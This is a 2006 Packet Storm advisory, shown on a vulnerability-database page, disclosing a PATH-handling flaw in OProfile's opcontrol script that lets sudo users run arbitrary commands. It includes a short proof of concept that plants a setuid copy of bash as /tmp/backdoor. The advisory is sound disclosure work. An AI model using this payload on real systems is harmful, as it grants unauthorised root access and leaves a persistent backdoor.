Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLuis Miguel Ferreira da SilvaPACKETSTORM:43645
HistoryFeb 08, 2006 - 12:00 a.m.

oprofile.txt

2006-02-0800:00:00
Luis Miguel Ferreira da Silva
packetstormsecurity.com
23
JSON
`Hello all,  
  
I recently audited a box with a software called OProfile  
(http://oprofile.sourceforge.net/).  
  
"OProfile is a system-wide profiler for Linux systems, capable of profiling all  
running code at low overhead. OProfile is released under the GNU GPL.  
It consists of a kernel driver and a daemon for collecting sample data, and  
several post-profiling tools for turning data into information.  
OProfile leverages the hardware performance counters of the CPU to enable  
profiling of a wide variety of interesting statistics, which can also be used  
for basic time-spent profiling. All code is profiled: hardware and software  
interrupt handlers, kernel modules, the kernel, shared libraries, and  
applications.  
OProfile is currently in alpha status; however it has proven stable over a large  
number of differing configurations; it is being used on machines ranging from  
laptops to 16-way NUMA-Q boxes. As always, there is no warranty. "  
  
At least one of the scripts that ships with this software (opcontrol) has a  
security flaw which enables a user to run arbitrary commands.  
  
The script itself isnt suid root *but*, to take full advantage of some of the  
features the software has, a lot of administrators give 'sudo' privileges to  
that script.  
  
Whoever coded the script tried protecting it against executing binaries out of a  
safe PATH by defining one on line 1416:  
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin  
  
The problem is that this script does not check where the 'which' or 'dirname'  
binary is executed from on line 1413/1414.  
  
This enables a malicious user to execute arbitrary code by using the following  
pseudo'exploit':  
cat > which  
#!/bin/sh  
/bin/cp /bin/bash /tmp/backdoor  
/bin/chmod 6755 /tmp/backdoor  
^C  
set PATH="."  
/usr/bin/sudo /usr/local/bin/opcontrol  
  
Vulnerable: <= oprofile-0.9.1  
  
I contacted the developer(s) and got the following response:  
"Do not trust admin privileges to unaudited code" - indeed these are words of  
wisdom :o)  
  
Apparently giving sudo to oprofile is a very common practice [Take RedHat for  
instance -> http://www.redhat.com/magazine/012oct05/features/oprofile/ ].  
  
Best regards,  
+---------------------------------  
| Luís Miguel Ferreira da Silva  
| Unidade de Qualidade e Segurança  
| Centro de Informática  
| Professor Correia Araújo  
| Faculdade de Engenharia da  
| Universidade do Porto`
JSON